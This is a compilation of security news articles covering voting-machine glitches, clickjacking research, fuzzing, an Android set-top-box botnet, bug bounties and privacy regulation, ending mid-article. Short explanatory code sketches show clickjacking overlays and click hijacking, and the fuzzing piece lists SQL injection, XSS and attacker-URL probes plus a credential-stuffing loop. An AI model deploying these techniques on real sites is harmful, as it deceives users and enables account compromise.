
Video captures glitching Mississippi voting machines flipping votes

“It is not letting me vote for who I want to vote for,” a Mississippi voter said in a video that shows him repeatedly pushing a button on an electronic touch-screen voting machine that keeps switching his vote to another candidate.

On Tuesday morning, the date of Mississippi’s Republican primary election for governor, the video was posted to Twitter and to Facebook by user Sally Kate Walker, who wrote this as a caption:

Ummmm … seems legit, Mississippi.

Walker said in a comment that the incident happened in Oxford, Miss., in Lafayette County. A local paper, the Clarion Ledger, reported that as of Tuesday night, there were at least three reports confirmed by state elections officials of voting machines in two counties changing voters’ selections in the state’s GOP governor primary runoff.

The machines were switching voters’ selections from Bill Waller Jr. – a former state Supreme Court chief justice – to Lt. Gov. Tate Reeves. Waller’s campaign told the Clarion Ledger it also received reports of misbehaving voting machines in at least seven other counties.

Waller conceded to Reeves around 9 p.m. on Tuesday night. With Reeves leading 54% to Waller’s 46%, it looks unlikely that the glitches affected the outcome.

The malfunctioning machine in Lafayette County – reportedly a paperless AccuVote TSX from Diebold – had recorded only 19 votes before it was discovered, according to Anna Moak, a spokeswoman for the Secretary of State’s Office. A technician was dispatched, and the machine is being replaced, she said.

Moak said that the machines are “county-owned and tested by local officials” and “to our knowledge, only one machine was malfunctioning.” State elections officials later confirmed that at least three machines in two counties had been switching votes.

The incident underscores concerns of election security advocates who’ve long warned that electronic voting systems – particularly the types in use in Mississippi, which fail to generate a verified paper backup – are a security risk because neither election officials nor the public are able to audit the results.

Lawrence Norden, co-author of a September 2015 report for the Brennan Center for Justice titled “America’s Voting Machines at Risk,” wrote in a 2017 blog post that 14 states – “including some jurisdictions in Georgia, Pennsylvania, Virginia, and Texas” – still use paperless electronic voting machines.

Those systems should be replaced “as soon as possible,” he said, and the best way to do that is decidedly low-tech:

The most important technology for enhancing security has been around for millennia: paper. Specifically, every new voting machine in the United States should have a paper record that the voter reviews, and that can be used later to check the electronic totals that are reported.

This could be a paper ballot the voter fills out before it is scanned by a machine, or a record created by the machine on which the voter makes her selections – so long as she can review that record and make changes before casting her vote.

Earlier this month, Norden, along with Andrea Córdova and Liz Howard, posted an update for the Brennan Center for Justice on where voting security stands six months before the New Hampshire primary.

Congress provided $380 million to states last year to help with voting technology upgrades, but it wasn’t enough, they said.

Experts agree that, for security and reliability reasons, systems more than a decade old need to be replaced. But by the Brennan Center’s estimate, as of November 2018, 34% of all local election jurisdictions in the US were using voting machines that were at least 10 years old: a number that includes counties and towns in 41 states.

Progress is being made: nearly half of states with paperless voting machines in 2016 will have replaced those machines by the 2020 elections. However, that still leaves as many as 16 million voters who’ll be casting votes on paperless, non-auditable systems in the 2020 election.

More from this week: the federal government, fearing state-sponsored ransomware attacks, is reportedly looking to boost protection for voter registration databases and systems ahead of the 2020 election.

On Monday, Reuters reported that the government plans to launch a program in about a month that will protect those databases and systems, which are used to validate the eligibility of voters.

Current and former officials told Reuters that such systems are deemed high risk, given that they’re one of the few pieces of technology that regularly connects to the internet.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/S5QpMILdY0g/

Web clickjacking fraud makes a comeback thanks to JavaScript tricks

More than a decade after hitting the headlines, clickjacking fraud remains an under-reported hazard on hundreds of popular websites, a team of university researchers has found.

Clickjacking, or UI redressing, encompasses a range of techniques through which fraudsters hide something that you almost certainly wouldn’t click on, such as an unwanted ad, behind something that looks innocent, such as a bogus ‘Facebook Like’ button.

In practice, clickjacking takes many different forms, but what all have in common is that the page element you are clicking on has a hidden purpose.
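
To make the idea concrete, here is a minimal, hypothetical sketch of the classic overlay variant in TypeScript: a transparent element is stacked above a harmless-looking decoy, so the victim’s click lands on the hidden target. The element styling and URL are illustrative, not taken from any real campaign.

```typescript
// Classic UI redressing, sketched: the victim sees the decoy button,
// but an invisible frame stacked above it receives the click.
const decoy = document.createElement("button");
decoy.textContent = "Like";  // what the victim thinks they are clicking
decoy.style.cssText = "position:absolute; top:100px; left:100px; z-index:1;";

const hiddenTarget = document.createElement("iframe");
hiddenTarget.src = "https://ad-network.example/click";  // illustrative URL
// Fully transparent and stacked above the decoy, so it intercepts the click.
hiddenTarget.style.cssText =
  "position:absolute; top:100px; left:100px; width:80px; height:30px; " +
  "opacity:0; z-index:2; border:none;";

document.body.append(decoy, hiddenTarget);
```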

The appeal of clickjacking to criminals is that it involves getting web users to do the clicking for them, which helps to make the fake clicks seem convincing.

The crooks could use robotic clickfraud to do the same job – indeed, many do – but machine clicks are often easier to detect, for example because they come from IP addresses associated with botnets, or produce patterns of clicks that look unnatural.

Bad clicks

In All Your Clicks Belong to Me: Investigating Click Interception on the Web, the team from the Chinese University of Hong Kong, Seoul National University, Pennsylvania State University, and Microsoft Research used a browser tool called Observer to analyse clicks on the top 250,000 Alexa-ranked sites, discovering 437 different clickjacking scripts on 613 websites.

While a small percentage of the total, these sites were still estimated to receive more than 600 million daily visits between them.

Predictably, around a third of sites used clickjacking for advertising fraud. The researchers didn’t have time to delve much further than this for other motivations but scamware such as fake antivirus was also in evidence.

While clickjacking scams have been a problem for more than a decade, the techniques used to intercept clicks continue to evolve, especially through the possibilities offered by JavaScript.

The researchers divided these into three techniques – interception by hyperlinks, interception by event handlers, and interception by visual deception.

Visual deception is the most straightforward of these – using visual tricks, such as mimicking legitimate page elements, to persuade users to click on something (i.e. hiding bad stuff behind what looks OK). It accounted for about 20% of the advertising clickfraud observed.

Another technique – behind 11% of the advertising clickfraud – uses event handlers planted in the site’s code to drive users to third-party URLs in ways that are hard to detect.
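
As an illustration only (this is not code from the study), an event-handler interception might look something like the following sketch, in which a third-party script registers a capture-phase listener that reroutes every link click to its own landing page. The URL is hypothetical.

```typescript
// Hypothetical third-party script: intercept clicks before the page's
// own handlers run and reroute them to a monetized landing page.
document.addEventListener(
  "click",
  (event: MouseEvent) => {
    const link = (event.target as HTMLElement).closest("a");
    if (link) {
      event.preventDefault();  // swallow the navigation the user intended
      window.open("https://third-party.example/landing", "_blank");
    }
  },
  true  // capture phase: fires before the page's own click handlers
);
```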

The most popular technique of all involved intercepting hyperlinks that users had clicked on, either by overwriting the href (hyperlink) attribute or by turning the entire page into one huge clickable element (a hypothetical sketch of the href variant follows the quote below). The researchers conclude:

Existing studies mainly consider one type of click interceptions in the cross-origin settings via iframes, i.e., clickjacking. This does not comprehensively represent various types of click interceptions that can be launched by malicious third-party JavaScript code.
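
That href-rewriting variant might look something like this hypothetical sketch; the destination URL and the data attribute are illustrative:

```typescript
// Hypothetical link-interception script: rewrite every anchor on the
// page so that clicks navigate to the interceptor's URL instead.
for (const anchor of Array.from(
  document.querySelectorAll<HTMLAnchorElement>("a")
)) {
  anchor.dataset.originalHref = anchor.href;            // keep the original for cover
  anchor.href = "https://interceptor.example/redirect"; // where clicks now go
}
```

The page looks untouched; only the click destinations have changed.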

The researchers also noted that some websites deliberately participate in clickjacking scams for financial gain. Bluntly:

We revealed that some websites collude with third-party scripts to hijack user clicks for monetization.

Ironically, it could be that better detection of machine-made clicks is partly to blame for the increased use of old-style clickfraud that exploits humans instead.

If that trend continues, we could see an upsurge in clickjacking reengineered to be more sophisticated than the wave of a decade ago. Sometimes the old tricks turn out to be the best ones.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wf8a5TMpoNo/

S2 Ep6: Instagram phishing, jailbreaking iPhones and social media hoaxes – Naked Security Podcast

Episode 6 of the Naked Security Podcast is now live!

This week, host Anna Brading is joined by Mark Stockley and Paul Ducklin to discuss jailbreaking iPhones [2’50”], sophisticated Instagram phishing [14’02”] and the latest social media hoax [28’23”].

As always, we love answering your cybersecurity questions on the show – simply comment below or ask us on social media.

Listen now and tell us what you think!

Listen and rate via iTunes...
Sophos podcasts on Soundcloud...
RSS feed of Sophos podcasts...

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cspLadXBXE0/

Fuzzing 101: Why Bug Hunters Still Love It After All These Years

Fuzzing is one of the basic tools in a researcher’s arsenal. Here’s what you should know about this foundational security research tool.

Image by Jen Goellnitz, Creative Commons

When you’re in the kitchen and throw pasta against the wall, it might stick so that you can tell whether it’s cooked. When you’re in computer security and you throw things against a target’s “wall,” they might do nothing … they might blow up the wall. Or they might land you in a different place entirely. That’s the allure — and the danger — of “fuzzing” as a research tool.

To understand what fuzzing is and why it’s so valuable, we go back 30 years to “An Empirical Study of the Reliability of UNIX Utilities,” a paper written by lead author Barton P. Miller, the “father of fuzzing.” In that paper, and in its 1995 follow-up “Fuzz Revisited,” Miller and his co-authors present the technique of throwing unanticipated input at utilities and programs to see what happens.

In the original paper, Miller wrote that the idea of fuzzing was born in line noise from a dial-up network connection. When random characters in the exchange caused a program to crash, it led researchers to wonder whether a tool generating random input strings could be valuable when looking at application security and reliability. As it turns out, it can be quite valuable — and the method can aid in discovering a host of vulnerabilities and errors.
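
In the spirit of that original experiment, a random fuzzer can be only a few lines long. Here is a minimal TypeScript sketch; the parseRecord target is a toy made up for illustration, whereas real fuzzing targets would be external utilities or libraries.

```typescript
// Toy target with a latent assumption: input must contain a colon.
function parseRecord(input: string): [string, string] {
  const i = input.indexOf(":");
  if (i < 0) throw new Error(`malformed record: ${input}`);
  return [input.slice(0, i), input.slice(i + 1)];
}

// Generate a random string of printable and control characters,
// roughly the "line noise" that inspired the technique.
function randomString(maxLen: number): string {
  const len = Math.floor(Math.random() * maxLen);
  let s = "";
  for (let i = 0; i < len; i++) {
    s += String.fromCharCode(1 + Math.floor(Math.random() * 126));
  }
  return s;
}

let crashes = 0;
for (let run = 0; run < 10_000; run++) {
  try {
    parseRecord(randomString(64));
  } catch {
    crashes++;  // in a real harness, each uncaught crash is a finding to triage
  }
}
console.log(`${crashes} crashing inputs out of 10,000 runs`);
```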

What Can Fuzzing Discover?
The errors and vulnerabilities that fuzzing can discover tend to fall into four broad categories: invalid inputs, memory leaks, assertion failures, and incorrect results or connections. A separate area of fuzzing is used in credential stuffing attacks. Each can result in its own form of insecurity for the application or system owner.

Invalid input: In almost every application that accepts user input, the program expects the input to be in a particular format. But what happens if, for example, a text string is entered into a date field? What happens if a series of emojis is entered into a name field? In both cases, type-checking functions should throw away the input and issue an error, but rushed developers don’t always include robust type-checking in their code. That’s when the vulnerabilities begin.
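
For example, robust type-checking for a date field might look like this hedged sketch; the function name is made up for illustration:

```typescript
// Reject anything that isn't a plausible ISO date before it reaches
// application logic; emoji, SQL, and free text all fail the same gate.
function parseDateField(raw: string): Date {
  if (!/^\d{4}-\d{2}-\d{2}$/.test(raw)) {
    throw new RangeError(`invalid date input: ${JSON.stringify(raw)}`);
  }
  const date = new Date(raw);
  if (Number.isNaN(date.getTime())) {
    throw new RangeError(`invalid calendar date: ${raw}`);
  }
  return date;
}

console.log(parseDateField("2019-08-29"));  // accepted
try {
  parseDateField("🎉🎉🎉");  // rejected with an error, not a crash
} catch (err) {
  console.log(String(err));
}
```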

Memory leaks: When applications use memory for instructions and data, they’re supposed to clean up after themselves, releasing the memory to be used again and keeping everything within the nice, neat, logical boundaries that computers love. Unfortunately, some programmers don’t follow best practices, and some programming languages thwart the best memory management efforts. Because of this, over time, memory becomes cluttered with stray data, information is stored where it shouldn’t be, and havoc ensues. Stuffing excessively large input into applications can speed up the process if good input validation isn’t in place, and fuzzing can help figure out where those opportunities for mayhem reside.

Assertion failure: Many applications assume that you’ve followed a logical path to get to a given point. That tends to mean that qualifications have been met and states set before you do what you’re doing now. But what if those states haven’t been set and those qualifications haven’t been met? If you’re still allowed to proceed, then an assertion failure has occurred — something the program was expecting hasn’t yet happened. Fuzzing is a great way to see if you can “skip the line” and get somewhere you shouldn’t be.

Unexpected connections: Fuzzing can help answer the question, “What if, instead of my first name, I entered a SQL command here?” Or, “What if I entered a URL where the application was expecting something else?” In each of these cases, if anything but a discarded input and error message result, then a vulnerability has been discovered.
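
A handful of probe strings, fed into fields that expect ordinary text, is often enough to surface this class of problem. In the small illustrative sketch below, submitField is a hypothetical stand-in for whatever harness actually drives the form under test:

```typescript
// Stand-in for the harness that actually drives the application's form.
function submitField(field: string, value: string): void {
  console.log(`submitting ${field} = ${value}`);
}

// Probes for "unexpected connection" behavior: anything other than a
// clean rejection and error message suggests a vulnerability.
const probes = [
  "Robert'); DROP TABLE students;--",  // SQL where a name is expected
  "https://attacker.example/payload",  // a URL where text is expected
  "<script>alert(1)</script>",         // markup where text is expected
];

for (const probe of probes) {
  submitField("first_name", probe);
}
```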

Credential stuffing: Report after report shows that human beings tend to rely on a handful of common, easily typed passwords for online accounts. And organizations tend to use a handful of formats for generating email addresses for employees. Attackers (or pen testers) can then try all of the common password types with each possible email address — statistically, they’ll get at least a few successful logins for each organization. Of course, running through all of the permutations can take time, unless the attacker is using an automated tool for fuzzing credentials.
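
The permutation space such a tool walks is easy to picture. A minimal sketch, with made-up names, email formats, and passwords, deliberately stopping short of any login logic:

```typescript
// Enumerate the candidate credentials a stuffing tool would try:
// common corporate email formats crossed with common passwords.
interface Person { first: string; last: string; }

const people: Person[] = [{ first: "jane", last: "doe" }];
const emailFormats: Array<(p: Person) => string> = [
  (p) => `${p.first}.${p.last}@example.com`,    // jane.doe@...
  (p) => `${p.first[0]}${p.last}@example.com`,  // jdoe@...
];
const commonPasswords = ["123456", "password", "Summer2019!"];

for (const person of people) {
  for (const format of emailFormats) {
    for (const password of commonPasswords) {
      // A real tool would attempt a login here; we just enumerate.
      console.log(format(person), password);
    }
  }
}
```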

Fuzzing Tools
In order to truly explore each type of vulnerability, a researcher must try a variety of different possibilities for each targeted input field. It would take far too much time to do this manually, so a variety of different automated tools have been developed to make the process faster and easier.

There are a number of free tools available for fuzzing.

While not a simple fuzzing tool, Google’s OSS-Fuzz is used by many researchers and can be a valuable tool for learning a complete research process around fuzzing. It’s also worth noting that Miller maintains a web page about fuzzing at the University of Wisconsin-Madison, including links to download all the software, definitions, and targets from his original research.


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, and INsecurity.

Article source: https://www.darkreading.com/edge/theedge/fuzzing-101-why-bug-hunters-still-love-it-after-all-these-years/b/d-id/1335672?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Privacy 2019: We’re Not Ready

To facilitate the innovative use of data and unlock the benefits of new technologies, we need privacy not just in the books but also on the ground.

Omer Tene, VP, International Association of Privacy Professionals (IAPP), also contributed to this article.

By any measure, this summer has been a busy time for privacy news. It started with a flurry of enforcement activity in Europe, including announcements from the UK privacy regulator of fines of $230 million against British Airways and $125 million against Marriott. It continued with a high-stakes standoff in Europe’s highest court between Max Schrems (a prominent privacy advocate), Facebook, and the Irish Data Protection Commissioner, which could jeopardize the future of transatlantic data flows. Finally, it ended with a big bang, as news of the FTC’s $5 billion fine against Facebook in connection with the Cambridge Analytica scandal was released to the humdrum of a summery Friday afternoon.

The message resonated loud and clear in corporate boardrooms from Silicon Valley to London: Privacy has become a first-order media and regulatory concern.

How should businesses respond to this new drumbeat of privacy outcries and enforcement actions? The risks of data mismanagement – now measured in hundreds of millions of dollars, and including security breaches, inappropriate information sharing, and “creepy” data uses – are no longer an acceptable cost of doing business. It is abundantly clear that society cannot experience the full benefits of a digital economy without investing in privacy.

The good news is that the public has recognized the gravity of the problem. Breakthroughs in healthcare, smart traffic, connected communities, and artificial intelligence (AI) confer tremendous societal benefits but, at the same time, create chilling privacy risks. The bad news is that we’re hardly ready to address these issues. As Berkeley professors Deirdre Mulligan and Kenneth Bamberger wrote in Privacy on the Ground: Driving Corporate Behavior in the United States and Europe, it’s one thing to have privacy “on the books,” but it’s quite another thing to have privacy “on the ground.”

According to research by the International Association of Privacy Professionals (IAPP), more than 500,000 organizations have already registered data protection officers in Europe. Yet only a fraction of those roles can actually be staffed by individuals who are trained on privacy law, technologies, and operations. To rein in data flows across thousands of data systems, sprawling networks of vendors, cloud architectures, and machine learning algorithms, organizations large and small must deploy highly qualified people, technologies, and processes that are still in the early developmental stage.   

First, the people who will serve as foot soldiers of this army of professionals must be modern-day renaissance persons. They have to be well-versed in the technology, engineering, management, law, ethics, and policy of the digital economy. They need to apply lofty principles like privacy, equality, and freedom in day-to-day operational settings to disruptive tech innovations such as facial recognition, consumer genetics, and AI. They need to understand not only the logic underlying black-box machine learning processes but also the mechanics of algorithmic decision-making and the social and ethical norms that govern them. Unfortunately, existing academic curricula are siloed in areas such as law, engineering, and management. Government, academic, and accreditation bodies should work to lower the walls between disciplines to ensure that lawyers and ethicists talk not only to each other but also with computer scientists, IT professionals, and engineers.

Second, researchers and entrepreneurs are building a vast array of technologies to help companies and individuals protect privacy and data. Just last week, OneTrust, a privacy tech vendor, raised $200 million at a valuation of $1.3 billion, making it the first privacy tech unicorn merely three years after its launch. Some of these new technologies help organizations better handle their privacy compliance and data management obligations. Others provide consumers with tools to protect and manage their own data through de-identification, encryption, obfuscation, or identity management. Over the next few years, governments and policymakers should give organizations incentives to innovate not only around data analytics and use but also around protection of privacy, identity, and confidentiality.   

Third, organizations should deploy data governance processes and best practices to ensure responsible and accountable data practices. Such processes include privacy impact assessments, consent management platforms, data mapping and inventories, and ongoing accountability audits. With guidance from regulators and frameworks from standard-setting bodies, such as the National Institute of Standards and Technology, procedural best practices will develop for both public and private sector players.

Like so many complex societal issues, privacy concerns require a matrix of responses. We certainly need strong laws and effective enforcement, but organizations should also embrace their stewardship of data and invest in the processes and technologies to better manage their data stores. Importantly, we need to continue to educate and train professionals with the knowledge and skills to make ethical, responsible decisions about how data is handled. To facilitate innovative data uses and unlock the benefits of new technologies, we need privacy not only in the books but also on the ground.


As president and CEO of the International Association of Privacy Professionals (IAPP), J. Trevor Hughes leads the world’s largest association of privacy professionals, which promotes, defines and supports the privacy profession globally.

Article source: https://www.darkreading.com/risk/privacy-2019-were-not-ready/a/d-id/1335621?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Botnet Targets Android Set-Top Boxes

ARES has already infected thousands of devices and is growing, IoT security firm says.

Thousands of Android set-top boxes of the sort used by people to stream media from Hulu, Netflix, and other services have been infected with malware and become part of a growing botnet of similarly compromised devices.

Internet of Things (IoT) security vendor WootCloud, which discovered the threat, has dubbed it the ARES ADB botnet. The botnet is being used as a launchpad to trigger multiple attacks such as brute-force password cracking, denial-of-service attacks, and cryptomining.

In a report this week, WootCloud described the botnet as targeting Android Debug Bridge (ADB), a management component on Android devices that enables debugging and remote management operations.

The ADB service is often left open and unauthenticated on many Internet-connected Android devices, giving attackers a way to access them and take full administrative control. “Accessing the device through TCP port 5555 results in obtaining shell which allows remote command execution, uploading/downloading of custom applications, data access,” and other activity, WootCloud warns.

The ARES botnet is the latest sign of attackers targeting vulnerable non-computer IoT devices to build botnets for a variety of malicious purposes. Following the Mirai botnet attacks of 2016, attackers have been actively targeting home routers, security cameras, DVRs, smart TVs, and other Internet-connected devices, which often have weak or no security protections. Many of these devices provide unauthenticated remote access or are protected only with default passwords, and cannot be easily patched or updated. Though many of the devices individually have little computing power, attackers are often able to infect tens of thousands of them at a time to build botnets capable of doing considerable damage.

With the latest threat, attackers are actively exploiting the ADB configuration issue to install the ARES bot on Android-based set-top boxes from several vendors, including HiSilicon and Cubetek. Once the bot gets installed on a device, it starts scanning for other set-top boxes with similarly misconfigured ADB interfaces and then installs payloads for triggering additional attacks.

Most infections so far have been in South Asia and the broader Asia-Pacific region. The command-and-control servers with which infected devices have been communicating have been observed at multiple locations, including North America.

Potentially Major Impact
Srinivas Akella, founder and chief technology officer at WootCloud, says the ARES botnet poses a potentially major threat to the growing number of other Android-based set-top boxes that consumers and enterprises are using. “This botnet has the potential to affect smart TVs and other IoT devices that have a misconfigured ADB,” he says.

With standard Android images, the ADB is not enabled by default. However, several set-top boxes that are available today are running customized versions of the Android OS, which have been rooted and have ADB enabled by default, he says.

To protect against the ADB being misused in cases where it is left enabled, routers can be configured to block the ingress and egress network traffic to TCP port 5555, which is the port that ADB uses.
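
For anyone comfortable with a command line, checking a network for exposed ADB services is straightforward. Here is a defensive sketch using Node.js’s net module; the subnet is illustrative and should be replaced with your own:

```typescript
import * as net from "net";

// Return true if `host` accepts a TCP connection on the ADB port (5555).
function adbPortOpen(host: string, timeoutMs = 1000): Promise<boolean> {
  return new Promise((resolve) => {
    const socket = net.connect({ host, port: 5555 });
    socket.setTimeout(timeoutMs);
    socket.once("connect", () => { socket.destroy(); resolve(true); });
    socket.once("timeout", () => { socket.destroy(); resolve(false); });
    socket.once("error", () => resolve(false));
  });
}

async function scanSubnet(): Promise<void> {
  for (let i = 1; i < 255; i++) {
    const host = `192.168.1.${i}`;  // illustrative home subnet
    if (await adbPortOpen(host)) {
      console.warn(`${host} exposes ADB on TCP 5555 - investigate this device`);
    }
  }
}

scanSubnet();
```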

Enterprises should also configure their network policies to restrict ingress and egress network traffic to IoT devices. “Restrict the ADB interface on the IoT devices to authorized IP address space,” he says. “Monitor the ADB interface traffic originating from unknown resources, including the network traffic originating from these devices.”

Organizations should also ensure that interfaces on IoT devices such as telnet and SNMP are properly protected with strong passwords to prevent unauthorized access, Akella says.

Home users of vulnerable set-top boxes may have a slightly harder time mitigating the risk. A lot depends on the design of the set-top box and whether the vendor provides an option to disable ADB functionality. When the option is not available, “home users will need to have technical acumen to disable the ADB functionality either by setting up their routers to block traffic,” Akella says, “or by logging in to the device and disabling ADB services on the command prompt.”


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication.

Article source: https://www.darkreading.com/attacks-breaches/new-botnet-targets-android-set-top-boxes/d/d-id/1335688?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Cloud Releases Beta of Managed Service to Microsoft AD

Managed Service for Microsoft Active Directory was built to help admins handle cloud-based workloads.

Google Cloud today released the public beta version of Managed Service for Microsoft Active Directory (AD), a move intended to help admins manage AD-dependent workloads in the cloud.

More apps and servers dependent on Microsoft AD are moving to the cloud, complicating processes for IT and security teams, which must meet latency and security goals while also configuring and securing AD Domain Controllers. Managed Service for Microsoft AD made its debut at the company’s Next 2019 conference in April.

The idea is to make it easier for admins to handle AD workloads, automate AD server maintenance and security configuration, and connect on-prem AD domains to the cloud.

Google Cloud’s service runs real AD Domain Controllers, so admins can use standard AD features such as Group Policy, as well as Remote Server Administration Tools and other tools, to manage the domain. It’s automatically patched and has default security configurations in place. Admins can connect on-prem AD to Google Cloud or use a standalone domain for cloud-based workloads.

Read more details here.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/cloud/google-cloud-releases-beta-of-managed-service-to-microsoft-ad/d/d-id/1335687?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Bug Bounties Continue to Rise, but Market Has Its Own 1% Problem

The average payout for a critical vulnerability has almost reached $3,400, but only the top bug hunters of a field of 500,000 are truly profiting.

Bug bounties continue to rise as more companies take part in crowdsourced challenges to attract security-minded freelancers and hackers to analyze their code, but the opportunities to profit typically fall to only a very small fraction of participants, according to security-program management firm HackerOne.

In its latest annual “Hacker-Powered Security Report,” the company found the average bounty paid to bug finders jumped to $3,384 for critical vulnerabilities, a 48% increase over the previous year’s average, with cryptocurrency and blockchain companies paying the most – $6,124, on average. In the past 12 months, more than 30,000 security issues were reported to HackerOne’s clients, which awarded vulnerability researchers more than $21 million.

Yet of the more than half-million hackers who have signed up for a HackerOne-managed challenge, only about 5,000 are really doing well, says CEO Marten Mickos.

“We have this enormous hacker community of half a million who are engaged and trying and competing,” he says. “It is a very small minority that rises to the top, and that is intentional.”

The report underscores the success of the bug-bounty model as a way to catch vulnerabilities in products and services. More than 1,400 organizations use HackerOne’s service and “hundreds” more use the crowdsourced security service of rival Bugcrowd. More than a quarter of HackerOne’s programs are for Internet and online services, and another 20% consist of computer software firms. However, financial services and media companies make up a significant part — more than 7% each — of the market.

Yet for the vast majority of interested researchers, the contest model does not work out. HackerOne boasts a half-dozen participants who have made more than $1 million on its platform, and another seven who have hit more than $500,000 in lifetime earnings — a tiny fraction of the more than 500,000 people who have signed up.

Mickos compares the winnowing of the competitive field to the struggle of becoming a movie star in Hollywood or going pro in basketball.

“Everyone plays basketball after school, but not everyone makes it to the NBA,” he says. “We need to have the broadest community to find those very few unique individuals who have the curiosity, the aptitude, the interest, the discipline to succeed.”

The overall rise in bug bounties comes as no surprise. In its own report, crowdsourced-security firm Bugcrowd saw payouts for security issues through its own programs rise 83%, with bounties for critical vulnerabilities up 27% to $2,670. The most lucrative payouts in Bugcrowd’s analysis were from Internet of Things manufacturers, which paid an average of $8,556 per critical vulnerability.

Part of the reason for the rise is that companies are paying more to find more difficult classes of bugs, according to HackerOne. 

“Looking at the data, 4 out of 5 of the top VRT (vulnerability rating taxonomy) classes for 2018 revolve around vulnerabilities that are difficult, if not impossible, for any machine to find,” the company states in the report.

Both Microsoft and Google have recently raised their bounties. In July, for example, Google raised the maximum payouts for several classes of vulnerabilities in its services and products, with the maximum baseline reward jumping to $15,000 from $5,000. And earlier this year, Zerodium, which sells exploits to governments to allow them to surveil citizens, raised its reward for an exploit chain, which strings several vulnerabilities together to compromise a particular program or operating system, to $2 million for Apple’s iOS operating system.

Yet those rewards are only for finding the most lucrative vulnerabilities. Only 7% of issues found in HackerOne programs were critical, with another 18% considered to be of high severity. The vast majority of vulnerabilities – 75% – were of low or medium severity. While the average bounty across the HackerOne platform rose 65% in the past 12 months, finding those vulnerabilities is far less lucrative.

The four industries that paid the highest bounties were cryptocurrency and blockchain companies, which paid $6,124 for critical issues; Internet and online service firms, which paid $4,973; aviation and aerospace firms, which paid $4,500; and electronics and semiconductor firms, which paid $4,398.

While rewards for most bugs continue to be low, the lure of bug-bounty competitions could play a significant role in attracting better talent to cybersecurity, which is in need of more personnel. 

“Out of that 500,000, maybe 50,000 will keep hacking, maybe 5,000 will become security professionals, and, out of that, maybe 500 will become CISOs,” Mickos says. “The nice thing is it will happen automatically. We are driving it by making it very attractive to young people to learn in our ranks.”


Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism.

Article source: https://www.darkreading.com/vulnerabilities---threats/vulnerability-management/bug-bounties-continue-to-rise-but-market-has-its-own-1--problem/d/d-id/1335689?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Announces New, Expanded Bounty Programs

The company is significantly expanding the bug-bounty program for Google Play and starting a program aimed at user data protection.

Google is upping its security game with the launch of a new Developer Data Protection Reward Program (DDPRP) and the significant expansion of the Google Play Security Reward Program (GPSRP).

According to the company, GPSRP will now include all Google Play apps with 100 million or more installs. The significant change is that all of these apps will be eligible for bug-bounty payment, even if the app publisher doesn’t run its own bug-bounty program. For those apps from publishers that do have existing bug-bounty programs, the GPSRP will now pay bounties in addition to those paid by the publisher.

The new DDPRP is being run in collaboration with HackerOne. The program is aimed at data-abuse issues in Android apps, OAuth projects, and Chrome extensions. The program, Google said in an announcement, is intended to reward any researcher providing “verifiable and unambiguous evidence of data abuse.”

Google noted that it is particularly interested in situations where user data is being sold unexpectedly or repurposed in an illegitimate manner without user consent.

For more, read here and here.


Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/cloud/google-announces-new-expanded-bounty-programs/d/d-id/1335690?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft may still be violating privacy rules, says Dutch regulator

After the privacy hell-hole that was Windows 10 circa 2017-ish, you’re doing better, the Dutch Data Protection Authority (DPA) told Microsoft on Tuesday, but you still aren’t legally kosher, privacy-wise.

A very quick recap: Users howled. Regulators scowled. Microsoft tweaked in 2017. The DPA investigated those tweaks. The upshot of its investigation: the DPA has asked the Irish privacy regulator – the Irish Data Protection Commission (DPC) – to re-investigate the privacy of Windows users.

What a long, strange privacy trip it’s been

A recap with more flesh on its bones: in 2015, Microsoft released Windows 10. From the get-go, France’s privacy watchdog – the National Data Protection Commission (CNIL) – had concerns about the operating system’s processing of personal data through telemetry.

Windows 10’s release had sparked a storm of controversy over privacy: concerns rose over the Wi-Fi password sharing feature, Microsoft’s plans to keep people from running counterfeit software, the inability to opt out of security updates, weekly dossiers sent to parents on their kids’ online activity, and the fact that Windows 10 by default was sharing a lot of users’ personal information – contacts, calendar details, text and touch input, location data, and more – with Microsoft’s servers.

After conducting tests, CNIL determined that there were plenty of reasons to think that Microsoft wasn’t compliant with the French Data Protection Act. In July 2016, it gave Microsoft three months to fix Windows 10 security and privacy.

After the CNIL’s warning and a slap from the Electronic Frontier Foundation (EFF), Microsoft made a series of changes to tackle the privacy concerns around Windows 10.

In January 2017, Microsoft launched a web-based privacy dashboard that let users pick and choose what information gets sent to the company – be it tracking data, speech recognition, diagnostics or advertising IDs that apps glue on to your system for targeted marketing.

OK, so Microsoft made some changes. Was it enough? No.

In October 2017, the DPA said that after looking into the privacy of users of Windows Home and Pro, it had concluded that Microsoft was still illegally processing personal data through telemetry. Specifically, it found that

Microsoft continuously collects technical performance and user data. This includes which apps are installed and, if the user has not changed the default settings, how often apps are used, as well as data on web surfing behaviour. These data are called ‘telemetry data’. Microsoft takes continuous pictures – as it were – of the behaviour of Windows users and sends them to itself.

The Dutch privacy watchdog ordered Microsoft to make more changes to Windows, which the company did in the April 2018 update. The DPA outlined what was expected from that update, to pull everything up to speed with the impending General Data Protection Regulation (GDPR):

Microsoft will ensure that users are better informed about the data it collects and what this data is used for. In addition, users can take active, straightforward steps to control their own privacy settings. In light of the new EU privacy law (the General Data Protection Regulation), which comes into force on 25 May 2018, the Dutch DPA has insisted that the update be implemented across the entire EU. Microsoft has agreed to do this, and the Dutch DPA will monitor implementation.

…all of which leads us up to now. So, how did that April 2018 update do?

Better, but maybe still in violation

